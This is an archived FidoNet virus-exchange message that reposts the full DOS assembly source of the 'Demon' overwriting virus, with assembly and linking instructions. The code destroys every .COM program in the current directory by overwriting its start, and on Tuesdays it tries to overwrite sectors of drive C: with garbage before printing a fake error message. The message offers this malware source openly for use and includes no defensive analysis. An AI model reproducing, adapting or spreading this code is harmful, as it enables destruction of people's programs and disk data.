;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 32 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : DEMON.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57) ;* To : Dr T. ;* Subj : DEMON.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Dt: 19-Oct-91 04:19 ;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org ;By: Skin Head ;To: All ;Re: New Source Code ;========== Demon virus ==================================== 22.09.91 ======== ; ; Assemble and link with: TASM DEMON.VIR ; TLINK DEMON /X/T ; Infect all .COM programs in current directory with: DEMON ; ; !!! NOT ON A TUESDAY !!! ; ;-------------- Constants and structures Tuesday = 2 ; INT 21h, AH=2Ah Search_Rec struc ; directory search record db 21 dup (?) ; reserved for DOS FileAttr db ? ; file attribute FileTime dw ? ; packed file time FileDate dw ? ; packed file date FileSize dd ? ; long file size FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT Search_Rec ends ;-------------- Demon virus segment Virus segment assume cs:Virus,ds:Virus,es:Virus,ss:Virus org 0080h DTA Search_Rec <> ; disk transfer area org 0100h Demon: ; virus entry point Virus_Size = Virus_End - Demon ; virus size = 272 bytes mov dx,offset All_COM ; find first .COM file, mov ah,4eh ; including hidden/system mov cx,110bh int 21h nop jnc Infect ; abort if no files found jmp short Check_Day Infect: call Replicate ; overwrite first 272 bytes mov dx,offset DTA mov ah,4fh ; find next .COM file, int 21h ; go check day if none found nop ; else repeat jnc Next_File jmp short Check_Day Next_File: jmp Infect Check_Day: mov ah,2ah ; get DOS date, check day int 21h cmp al,Tuesday ; Tuesday ? je Thrash_Drive ; if yes, thrash drive C: mov ah,4ch ; else exit to DOS int 21h Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors jmp Write_Sectors ; of drive C: with garbage Write_Sectors: mov al,Drive_C ; Error: doesn't work ! mov cx,160 ; AL=C:, CX=160 sectors mov dx,0 ; DX=highest sector in drive ! mov bx,0 ; DS:BX=start of PSP area int 26h ; overwrite sectors inc Counter cmp Counter,10 ; repeat 10 times je Show_Msg jne Write_Sectors Show_Msg: mov ah,09h ; show a fake error message mov dx,offset Virus_Msg ; and exit to DOS int 21h mov ah,4ch int 21h Replicate: mov dx,offset DTA.FileName ; save file attribute mov ax,4300h int 21h mov COM_Attr,cx nop xor cx,cx ; unprotect the .COM file mov ax,4301h ; in case it's read-only int 21h nop mov ax,3d02h ; open .COM file for R/W, int 21h ; abort on error nop jc Check_Day mov bx,ax ; BX = file handle mov ax,5700h int 21h ; save file date and time nop mov COM_Time,cx mov COM_Date,dx mov dx,offset Demon ; overwrite first 272 bytes mov ah,40h ; of .COM program file mov cx,Virus_Size ; with the virus code int 21h nop mov ax,5701h ; restore file date and time mov dx,COM_Date mov cx,COM_Time int 21h mov ah,3eh ; close the file int 21h nop mov dx,offset DTA.FileName ; restore file attribute mov cx,COM_Attr mov ax,4301h int 21h retn All_COM db '*.COM',0 ; dir search specification COM_Date dw 0 ; packed .COM program date COM_Time dw 0 ; packed .COM program time COM_Attr dw 0 ; .COM program file attribute Counter db 0 ; used when thrashing drive C: Drive_C db 2 ; INT 26h C: drive number dw 0 Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)' dw 0 Virus_Msg db 10,13,'Error eating drive C:',10,13,'$' Virus_End label byte ; virus code+data end Virus ends end Demon ;-+- FastEcho/386 1.41.b7/Real ; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)